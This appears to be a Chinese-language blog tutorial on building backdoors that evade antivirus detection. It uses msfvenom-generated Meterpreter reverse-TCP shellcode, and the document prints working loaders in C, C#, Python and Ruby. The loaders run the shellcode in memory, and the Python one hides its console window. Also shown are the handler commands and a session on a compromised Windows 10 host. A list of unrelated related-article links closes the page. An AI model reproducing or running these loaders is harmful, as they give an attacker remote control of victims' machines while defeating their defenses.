众所周知,目前的杀毒软件的杀毒原理主要有三种方式,一种基于特征,一种基于行为,一种基于云查杀,其中云查杀的一些特点基本上也可以概括为特征码查杀,不管是哪一种杀毒软件,都会检查PE文件头,尤其是当后门程序越大时,越容易被查杀。

通过C语言编译后门

1.首先使用msfvenom命令生成一句简短的shellcode,这里指定连接地址为IP=192.168.1.7,PORT=8888,当执行shellcode生成命令时屏幕会输出一些十六进制的文本,这些文本其实是机器码的编码形式,以下是对参数的解释.

[root@localhost ~]# msfvenom -a x86 --platform Windows \

>                              -p windows/meterpreter/reverse_tcp \

>                              -b '\x00\x0b' LHOST=192.168.1.7 LPORT=8888 -f c

Found 11 compatible encoders

Attempting to encode payload with 1 iterations of x86/shikata_ga_nai

x86/shikata_ga_nai succeeded with size 368 (iteration=0)

x86/shikata_ga_nai chosen with final size 368

Payload size: 368 bytes

Final size of c file: 1571 bytes

unsigned char buf[] =

"\xd9\xc5\xd9\x74\x24\xf4\xba\x8b\xfc\x02\xdd\x5e\x2b\xc9\xb1"

"\x56\x83\xee\xfc\x31\x56\x14\x03\x56\x9f\x1e\xf7\x21\x77\x5c"

"\xf8\xd9\x87\x01\x70\x3c\xb6\x01\xe6\x34\xe8\xb1\x6c\x18\x04"

"\x39\x20\x89\x9f\x4f\xed\xbe\x28\xe5\xcb\xf1\xa9\x56\x2f\x93"

"\xca\xec\x3f\xcd\x34\xa2\x40\xc4";

-a              #指定payload目标框架

--platform      #指定payload的目标平台

-p, --payload   #指定需要使用的payload(攻击荷载)

-f, --format    #指定输出格式 (使用 --help-formats 来获取msf)

-b '\x00\x0b'   #规避特殊字符串

2.将上面的ShellCode代码复制下来,打开VS Express编译器,并写以下C代码,这里使用内联汇编的形式调用这段ShellCode代码.

#include <stdio.h>

#include <windows.h>

//#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")  // 隐藏控制台窗口显示

#pragma comment(linker,"/INCREMENTAL:NO")                                     // 减小编译体积

#pragma comment(linker, "/section:.data,RWE")                                 // 启用数据段可读写

unsigned char shellcode[] =

"\xd9\xc5\xd9\x74\x24\xf4\xba\x8b\xfc\x02\xdd\x5e\x2b\xc9\xb1"

"\x56\x83\xee\xfc\x31\x56\x14\x03\x56\x9f\x1e\xf7\x21\x77\x5c"

"\xf8\xd9\x87\x01\x70\x3c\xb6\x01\xe6\x34\xe8\xb1\x6c\x18\x04"

"\x39\x20\x89\x9f\x4f\xed\xbe\x28\xe5\xcb\xf1\xa9\x56\x2f\x93"

"\xca\xec\x3f\xcd\x34\xa2\x40\xc4";

int main(int argc, char **argv)

{

	__asm

	{

		lea eax, shellcode

			call eax

	}

	return 0;

}

此外出去上面的这种汇编形式,这里我也整理了其他的一些调用ShellCode的代码.

    //第1种方法

    void RunShellCode_2()

    {

        ((void(*)(void))&shellcode)();

    }  

    //第2种方法

    void RunShellCode_3()

    {

        __asm

        {

            lea eax, shellcode;

            jmp eax;

        }

    }  

    //第3种方法

    void RunShellCode_4()

    {

        __asm

        {

            mov eax, offset shellcode;

            jmp eax;

        }

    }  

    //第4种方法

    void RunShellCode_5()

    {

        __asm

        {

            mov eax, offset shellcode;

            _emit 0xFF;

            _emit 0xE0;

        }

    }

3.在MFS控制主机,启动侦听程序.

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) >

msf5 exploit(multi/handler) > show options

msf5 exploit(multi/handler) > set lhost 192.168.1.7

lhost => 192.168.1.7

msf5 exploit(multi/handler) > set lport 8888

lport => 8888

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.7:8888

启动我们的shellcode代码,就可看到反弹回一个shell.

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.7:8888

[*] Sending stage (179779 bytes) to 192.168.1.2

[*] Meterpreter session 1 opened (192.168.1.7:8888 -> 192.168.1.2:36805)

meterpreter > sysinfo

Computer        : lyshark

OS              : Windows 10 (Build 19999).

Architecture    : x64

System Language : zh_CN

Domain          : WORKGROUP

Logged On Users : 2

Meterpreter     : x86/windows

meterpreter >

通过C#语言编译后门

C#的在Windows平台下的编译器名称是Csc.exe,如果你的.NET FrameWork SDK安装在C盘,那么你可以在C:\Windows\Microsoft.NET\Framework64目录中找到他的编译程序。为

了使用方便,你可以手动把这个目录添加到Path环境变量中去。

1.使用MSF工具生成后门ShellCode,并将这段ShellCode保存到lyshark.txt。

[root@localhost ~]#  msfvenom --platform Windows -a x64 -p windows/x64/meterpreter/reverse_tcp_uuid \

>                               LHOST=192.168.1.30 LPORT=8080 -b '\x00' \

>                               -e x64/xor -i 10 -f csharp \

>                                -o ./lyshark.txt

2.将生成的ShellCode加入到加载程序中

using System;

using System.Runtime.InteropServices;

namespace TCPMeterpreterProcess

{

    class Program

    {

        static void Main(string[] args)

        {

	// 存放ShellCode代码

byte[] shellcode = new byte[951] {

0x48,0x31,0xc9,0x48,0x81,0xe9,0x8e,0xff,0xff,0xff,0x48,0x8d,0x05,0xef,0xff,

0xff,0xff,0x48,0xbb,0xa9,0x1e,0xb2,0x1e,0x97,0xb9,0xdc,0x04,0x48,0x31,0x58,

0x27,0x48,0x2d,0xf8,0xff,0xff,0xff,0xe2,0xf4,0xe1,0x2f,0x7b,0x56,0x16,0x50,

0x4f,0xfb,0x56,0xe1,0xfa,0x93,0x92,0x56,0x23,0xfb,0x56,0x56,0x09,0x0c,0xb8,

0x16,0xa5,0xb6,0x2c,0x64,0xbd,0x56,0xa6,0xe1,0xfb,0x4c,0x84,0xe6,0x4d,0xe1,

0x68,0x5b,0x28,0x5e,0xb7,0x78,0x83,0x2d,0xfb,0x5b,0x2c,0xe9,0x79,0xf9,0x46,

0xa9,0xfd,0x3c,0x2c,0xe9,0xce,0x0a,0x9a,0xfa,0x03,0xc7,0x18,0x47,0x90,0xc3,

0x83,0x9d,0x4a,0xe4,0x9b,0x3b,0x7e,0x4e,0x34,0x53,0xf0,0x37,0xca,0x71,0x5e,

0xfd,0x81,0x14,0x99,0x4e,0x7d,0xbf,0xdf,0x38,0x05,0x12,0xfb,0x4e,0x7d,0x08,

0x2c,0x2b,0x42,0xe6,0xbc,0x1e,0x98,0x2a,0xf3,0xfd,0x31,0xa5,0x23,0xf9,0xaf,

0xb8,0x68,0x4a,0xff,0x1f,0xf0,0x67,0xf1,0x92,0x67,0x9b,0xf3,0x35,0x9f,0xd0,

0x3f,0x13,0xa2,0x1f,0xf5,0x68,0x9f,0xd0,0x88,0xe0,0xb6,0x88,0x26,0x71,0xaa,

0xa9,0x0c,0xe6,0x67,0x2b,0x42,0xb0,0x28,0x02,0x38,0xa4,0xd0,0xe5,0xf8,0x63,

0xb1,0x8c,0x35,0xf5,0x64,0x75,0x71,0xd5,0x06,0x42,0xb4,0x30,0xe0,0x73,0x29,

0xd5,0x06,0xf5,0x47,0x80,0xbc,0xe3,0x0f,0x19,0x83,0x27,0x8c,0xf5,0xd4,0xc4,

0xf1,0x62,0xd4,0x45,0x03,0x42,0x1a,0x7e,0x22,0x5f,0x91,0x0b,0x6d,0x0f,0x76,

0xaa,0x59,0xe8,0x5f,0x8a,0xa8,0x8b,0x70,0xf9,0x59,0xe8,0xe8,0x79,0x28,0x5a,

0xd8,0xb3,0x68,0x82,0xb5,0x86,0x6d,0xbf,0xc7,0x21,0xee,0x3a,0x58,0x3d,0xda,

0x71,0x7d,0xf2,0xe3,0xf2,0x2e,0x3f,0x6a,0xf2,0x3b,0xbd,0x54,0x3c,0xaf,0xfa,

0xee,0xf4,0x75,0xbd,0x54,0x8b,0x5c,0x51,0x36,0x2b,0x46,0x92,0xd9,0x8a,0x1f,

0x3f,0xda,0x43,0xad,0x0a,0x86,0x3b,0x18,0x88,0x14,0xf9,0x7e,0x2c,0x47,0x3a,

0x63,0x26,0x70,0xe4,0x8d,0x9b,0x89,0xbb,0xa6,0xa2,0x76,0xad,0x8d,0x9b,0x3e,

0x48,0x1c,0x1f,0x95,0xca,0x0d,0x10,0x42,0xce,0x63,0x96,0xc1,0x75,0x3a,0x49,

0x8e,0x0c,0xd4,0x58,0x7b,0xa6,0x0d,0xed,0xb3,0x23,0xd5,0x3a,0x16,0x90,0xba,

0x23,0x32,0xe6,0x51,0x3c,0x52,0x90,0xba,0x94,0xc1,0xd7,0x4d,0xe5,0xcf,0xed,

0x5f,0xe2,0xc1,0x23,0x65,0x8b,0x8a,0x27,0x68,0x24,0x85,0x94,0xab,0x31,0x59,

0x2f,0x14,0x69,0xfc,0x19,0xa6,0x21,0x16,0xd3,0x5c,0xab,0x49,0xa8,0x1e,0xbf,

0x47,0x85,0x14,0xdb,0xca,0x8c,0x06,0x66,0x44,0xb3,0x14,0x61,0x4a,0xf1,0x06,

0x66,0x44,0xf3,0x14,0x61,0x6a,0xb9,0x06,0xe2,0xa1,0x99,0x16,0xa7,0x29,0x20,

0x06,0xdc,0xd6,0x7f,0x60,0x8b,0x64,0xeb,0x62,0xcd,0x57,0x12,0x95,0xe7,0x59,

0xe8,0x8f,0x0f,0xfb,0x81,0x1d,0xbb,0x50,0x62,0x1c,0xcd,0x9d,0x91,0x60,0xa2,

0x19,0x39,0x28,0x6c,0x6e,0xcb,0x57,0xe8,0x17,0x6c,0x3c,0xed,0x16,0xd3,0xd7,

0x6a,0x90,0xe9,0x4e,0xed,0x5e,0x56,0x9c,0x9e,0x7f,0xa1,0x4f,0x3d,0x46,0x58,

0x14,0xf2,0x5c,0x62,0x0e,0xcd,0x5f,0xd2,0x8c,0x09,0x4e,0xa1,0xb1,0x24,0x57,

0x58,0x68,0x62,0x50,0xe8,0x98,0xa0,0x27,0x1a,0x14,0xdb,0xd8,0x45,0x0f,0x2c,

0xdf,0xde,0x1d,0xeb,0xd9,0xd1,0xae,0x98,0xe7,0x9f,0x5f,0xa6,0x3c,0xe1,0x0b,

0xd4,0xc7,0xa6,0x84,0xb2,0x5c,0x62,0x0e,0xc9,0x5f,0xd2,0x8c,0x8c,0x59,0x62,

0x42,0xa5,0x52,0x58,0x1c,0xf6,0x51,0xe8,0x9e,0xac,0x9d,0xd7,0xd4,0xa2,0x19,

0x39,0x0f,0xb5,0x57,0x8b,0x02,0xb3,0x42,0xa8,0x16,0xac,0x4f,0x92,0x06,0xa2,

0x9b,0x05,0x6e,0xac,0x44,0x2c,0xbc,0xb2,0x59,0xb0,0x14,0xa5,0x9d,0xc1,0xb5,

0xa1,0xe7,0x16,0xb1,0xb0,0x5f,0x6d,0x2b,0x99,0x2a,0xb6,0x7d,0xdf,0x16,0xd3,

0x1d,0xbc,0x51,0x60,0xa8,0xa5,0x97,0x3f,0xfc,0xeb,0x18,0xe9,0x07,0x64,0xf3,

0x9a,0xe0,0xe8,0x18,0xf6,0xde,0x2d,0xbe,0xd2,0x42,0xab,0x4c,0xa0,0xc7,0x09,

0x5a,0x5a,0xad,0xab,0xa2,0xa5,0x39,0xcb,0x11,0x2c,0x89,0xa6,0x91,0x03,0x26,

0xec,0x17,0xd3,0x5c,0xb3,0x59,0x53,0x67,0x6d,0x7d,0xd3,0xa3,0x3f,0x72,0xe3,

0x0f,0xb3,0x46,0x83,0x11,0xdb,0xd1,0xa4,0x7f,0x2d,0x5e,0x2c,0x9c,0xa2,0x91,

0x2b,0x06,0x12,0xd6,0x9b,0xd5,0x2b,0x59,0x53,0xa4,0xe2,0xc9,0x33,0xa3,0x3f,

0x50,0x60,0x89,0x87,0x06,0x92,0x04,0xa6,0x91,0x0b,0x06,0x64,0xef,0x92,0xe6,

0x73,0xbd,0x9d,0x2f,0x12,0xc3,0x56,0x9c,0x9e,0x12,0xa0,0xb1,0x23,0x63,0x36,

0xb4,0x56,0x18,0xe9,0x4e,0xa0,0x27,0x1a,0x36,0xfa,0x59,0xb1,0xa6,0xfd,0x16,

0xd3,0x5c,0x8a,0xc6,0x40,0xf6,0xf2,0x4c,0xe3,0xb5,0xa8,0x07,0xaa,0x53,0xf2,

0x47,0xfa,0x74,0xb0,0x50,0x60,0xb7,0xa4,0xd1,0x11,0x9e,0x01,0x20,0xb6,0xb1,

0x38,0x5e,0x50,0xb0,0xfa,0x50,0x60,0xac,0xa0,0x27,0x1a,0x36,0xee,0x59,0xb1,

0x06,0x64,0xef,0x92,0xe6,0xe8,0xc1,0x21,0x11,0x12,0xc3,0x50,0xa4,0xea,0x66,

0xbc,0x06,0x6e,0xd2,0xf3,0x02,0x63,0xee,0x83,0x0e,0xac,0x4f,0xbb,0x5c,0xfa,

0x18,0xe9,0x0f,0xb5,0x5e,0x5a,0xae,0xa2,0x29,0x20,0x0f,0x57,0x4e,0x77,0x0f,

0x0f,0xe7,0x3c,0x06,0x64,0xd5,0x9a,0xd5,0x2d,0x55,0xd8,0x87,0xa4,0x9f,0x23,

0x14,0x63,0xc2,0xa1,0xc7,0x14,0x57,0x69,0x5e,0x33,0xd0,0xb6,0xb1,0x38,0x95,

0x2b,0x5c,0x97,0x30,0xb1,0x0f,0xba,0x4f,0xbb,0x5c,0xaa,0x18,0xe9,0x0f,0xb5,

0x7c,0xd3,0x06,0xab,0xa2,0xe2,0x61,0xe2,0x26,0x2c,0x89,0xbd,0x41,0xa8,0xf4,

0x98,0x78,0x9e,0x3d,0x15,0xcd,0xa0,0xb1,0x23,0xff,0xc0,0xa3,0x15,0xe7,0xa1,

0x4f,0x2e,0x5e,0xfa,0x9a,0xa2,0x9d,0x1f,0x3b,0x59,0x57,0x2c,0xbb,0xb2,0x72,

0xe9,0x17,0xa4,0xd1,0x11,0xac,0x5f,0xba,0xbf,0xb1,0x38,0x16,0x6f,0x72,0x42,

0xa6,0x2a,0x60,0xb1,0xd3,0x04 };

            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,

MEM_COMMIT, PAGE_EXECUTE_READWRITE);

Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);

IntPtr hThread = IntPtr.Zero;

UInt32 threadId = 0;

// prepare data

IntPtr pinfo = IntPtr.Zero;

// execute native code

hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);

WaitForSingleObject(hThread, 0xFFFFFFFF);

}

        private static UInt32 MEM_COMMIT = 0x1000;

private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

[DllImport("kernel32")]

        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,

UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

[DllImport("kernel32")]

        private static extern bool VirtualFree(IntPtr lpAddress,

UInt32 dwSize, UInt32 dwFreeType);

[DllImport("kernel32")]

        private static extern IntPtr CreateThread(

UInt32 lpThreadAttributes,

UInt32 dwStackSize,

UInt32 lpStartAddress,

IntPtr param,

UInt32 dwCreationFlags,

ref UInt32 lpThreadId

);

[DllImport("kernel32")]

        private static extern bool CloseHandle(IntPtr handle);

[DllImport("kernel32")]

        private static extern UInt32 WaitForSingleObject(

IntPtr hHandle,

UInt32 dwMilliseconds

);

[DllImport("kernel32")]

        private static extern IntPtr GetModuleHandle(

string moduleName

);

[DllImport("kernel32")]

        private static extern UInt32 GetProcAddress(

IntPtr hModule,

string procName

);

[DllImport("kernel32")]

        private static extern UInt32 LoadLibrary(

string lpFileName

);

[DllImport("kernel32")]

        private static extern UInt32 GetLastError();

}

}

3.使用C#编译器编译这段代码,这里我保存为了lyshark.cs你可以自行命名,最终编译出来的代码才5kb不到。

C:\Users\lyshark\Desktop>csc /unsafe /platform:x64 /out:lyshark.exe lyshark.cs

Microsoft (R) Visual C# Compiler version 4.7.3190.0

for C# 5

Copyright (C) Microsoft Corporation. All rights reserved.

4.接着运行程序,回到MSF控制台启动监听。

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 192.168.1.30

lhost => 192.168.1.7

msf5 exploit(multi/handler) > set lport 8080

lport => 8080

msf5 exploit(multi/handler) > set exitonsession false

exitonsession => false

msf5 exploit(multi/handler) > set enablecontextencoding true

enablecontextencoding => true

msf5 exploit(multi/handler) > set Stageencoder x64/xor

Stageencoder => x64/xor

msf5 exploit(multi/handler) > set stageencodingfallback false

stageencodingfallback => false

msf5 exploit(multi/handler) > exploit -j -z

5.客户端运行后门。

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile=

/LogToConsole=false /U lyshark.exe

通过Python语言编译后门

1.首先生成利用代码,将内容写入到lyshark.py文件中。

[root@localhost ~]# msfvenom -p python/meterpreter/reverse_tcp \

> lhost=192.168.1.30 lport=8888 \

> -f raw -o lyshark.py

2.手动复制这段生成后的代码片段。

[root@localhost ~]# cat lyshark.py

import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMS4zMCcsODg4OCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=')))

3.我们在其上方加入一段屏蔽控制台窗口的代码,来实现隐藏控制台窗口,最终代码如下。

import base64,sys;

import ctypes

whnd = ctypes.windll.kernel32.GetConsoleWindow()

if whnd != 0:

    ctypes.windll.user32.ShowWindow(whnd, 0)

    ctypes.windll.kernel32.CloseHandle(whnd)

exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMS4zMCcsODg4OCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=')))

4.使用pyinstaller封装成可执行程序,这里使用-F封装成单个.exe文件,如果没有的话可以在命令行执行 pip install pyinstaller 安装这个工具。

C:\Users\lyshark\Desktop>pyinstaller -F lyshark.py

107 INFO: PyInstaller: 3.4

108 INFO: Python: 3.7.3

109 INFO: Platform: Windows-10-10.0.17763-SP0

113 INFO: wrote C:\Users\lyshark\Desktop\lyshark.spec

116 INFO: UPX is not available.

120 INFO: Extending PYTHONPATH with paths

['C:\\Users\\lyshark\\Desktop', 'C:\\Users\\lyshark\\Desktop']

121 INFO: checking Analysis

121 INFO: Building Analysis because Analysis-00.toc is non existent

121 INFO: Initializing module dependency graph...

124 INFO: Initializing module graph hooks...

129 INFO: Analyzing base_library.zip ...

5.在MSF控制台,打开一个监听事件,并运行生成的二进制后门 lyshark.exe 完美实现免杀。

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) >  set lhost 192.168.1.30

lhost => 192.168.1.30

msf5 exploit(multi/handler) >  set lport 8888

lport => 8888

msf5 exploit(multi/handler) > exploit -j -z

[*] Exploit running as background job 0.

[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.1.30:8888

msf5 exploit(multi/handler) > sessions -i

当下,除了白名单上线外,python后门的稳定性一直很高,这也是因为python是脚本的原因,杀软并没有重视这一块。

通过Ruby语言编译后门

[root@localhost ~]#  msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.rb

[root@localhost ~]#  msfvenom ‐p windows/messagebox TEXT=Micropoor TITLE=Micropoor ‐f ruby ‐‐smallest


require 'fiddle'

require 'fiddle/import'

require 'fiddle/types'

shellcode =

"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64" +

"\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e" +

"\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60" +

"\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b" +

"\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01" +

"\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d"

include Fiddle

kernel32 = Fiddle.dlopen('kernel32')

ptr = Function.new(kernel32['VirtualAlloc'], [4,4,4,4], 4).call(0, shellcode.size, 0x3000, 0x40)

Function.new(kernel32['VirtualProtect'], [4,4,4,4], 4).call(ptr, shellcode.size, 0, 0)

buf = Fiddle::Pointer[shellcode]

Function.new(kernel32['RtlMoveMemory'], [4, 4, 4], 4).call(ptr, buf, s

hellcode.size)

thread = Function.new(kernel32['CreateThread'], [4,4,4,4,4,4],4).call(0, 0, ptr, 0, 0, 0)

Function.new(kernel32['WaitForSingleObject'], [4,4], 4).call(thread,‐1)

Payload 实现分离免杀的更多相关文章

  1. payload分离免杀

    shellcode loader 借助第三方加载器,将shellcode加载到内存中来执行. https://github.com/clinicallyinane/shellcode_launcher ...

  2. 《Python绝技:运用Python成为顶级黑客》 用Python实现免杀

    1.免杀的过程: 使用Metasploit生成C语言风格的一些shellcode作为载荷,这里使用Windows bindshell,功能为选定一个TCP端口与cmd.exe进程绑定在一起,方便攻击者 ...

  3. 那些shellcode免杀总结

    首发先知: https://xz.aliyun.com/t/7170 自己还是想把一些shellcode免杀的技巧通过白话文.傻瓜式的文章把技巧讲清楚.希望更多和我一样web狗也能动手做到免杀的实现. ...

  4. Kail Linux渗透测试教程之免杀Payload生成工具Veil

    Kail Linux渗透测试教程之免杀Payload生成工具Veil 免杀Payload生成工具——Veil Kail Linux渗透测试教程之免杀Payload生成工具Veil,Veil是一款利用M ...

  5. 迁移Veil:手工打造Windows下编译的免杀Payload

    作者:RedFree 本文转自乌云 Veil对Payload的免杀已经做的很好了,最新的Veil有39个可用的Payload.但是有时候需要使用Windows来完成所有的渗透测试工作,Linux和Wi ...

  6. payload免杀之msbuild利用

    0x00 前言 红队必备技巧免杀之一,现在主要是.net4.0下实现.待我过几天有空实现一下.net2.0. 0x01 免杀过程 利用cs生成c#的payload,如图所示: 将paypload内容填 ...

  7. 记一次payload绕过电脑管家免杀

    一.msf命令提示符下generate命令生成1.首先可以使用show payloads命令查看所有的payload,然后使用use命令选中其中一个. 2.使用generate -h查看命令帮助 ge ...

  8. [原创]Python免杀ShellCode加载器(Cobaltstrike/Metasploit)

    0x001 原理 采用分离法,即将ShellCode和加载器分离.方法较LOW但免杀. 本文主要将ShellCode转成HEX,再通过加载器执行ShellCode. PS: 何为SC加载器,即专门用于 ...

  9. 【原创】ShellCode免杀的骚姿势

    ShellCode免杀的骚姿势 常见的免杀手法: shellcode(攻击代码)和加载程序的分离: Lolbins白利用加载shellcode(白名单利用): shellcode混淆.编码解码: sh ...

随机推荐

  1. Python3 编程之字符串处理

    Python3 编程之字符串处理 在编程中最常见的任务就是字符串的处理,So,学好字符串的使用非常重要 一.变量的定义规范 Python中声明变量时,要符合以下规则为准: 只能使用数字.字母.下划线组 ...

  2. react hook的todolist

    感觉好长时间没写博客一样,app.js代码 import React from 'react'; import { useState } from 'react'; function App() { ...

  3. react native Expo适配全面屏/Expo识别全面屏和正常屏

    一.最新版本的expo已经默认支持了全面屏,即不会像react native cli一样出现底部黑边 二.但是全面屏通过Dimensions.get('window')获取的高度还是不准确,因为全面屏 ...

  4. AnimationDrawable

    ①先定义一个AnimationDrawable的xml资源文件: <?xml version="1.0" encoding="utf-8"?> &l ...

  5. 数据分析 - Power BI

    BI 目的 单表的展示有限很多的时候只能体现现象, 仅仅进行监控级别没问题 但是就数据分析而言实在不够用, 大部分的事情需要多表多图展示才可以通过现象深入挖掘诱因 BI 安装 这里使用 microso ...

  6. 广告行业——数字广告营销中的DSP、SSP、RTB是个什么概念

    原文链接1 原文链接2 如我是一个创业公司,没啥钱,老板给了1000块钱预算,让我去投互联网广告,对我说: “小卡啊!给你1000块钱,我知道你没见过那么多的巨款吧!不要被吓着,尽情去挥霍吧!哦对了, ...

  7. 阶段5 3.微服务项目【学成在线】_day02 CMS前端开发_04-vuejs研究-vuejs基础-v-model指令

    <!DOCTYPE html> <html lang="en" xmlns:v‐on="http://www.w3.org/1999/xhtml&quo ...

  8. distinct 排除重复 函数

    select count(distinct uid) from ib_user_settings; 参考: http://www.w3school.com.cn/sql/sql_distinct.as ...

  9. Python排序算法之选择排序定义与用法示例

    Python排序算法之选择排序定义与用法示例 这篇文章主要介绍了Python排序算法之选择排序定义与用法,简单描述了选择排序的功能.原理,并结合实例形式分析了Python定义与使用选择排序的相关操作技 ...

  10. golang struct组合,转型问题请教

    type Action interface { OnHurt2(other Action) GetDamage() int } type Base struct { atk, hp int } fun ...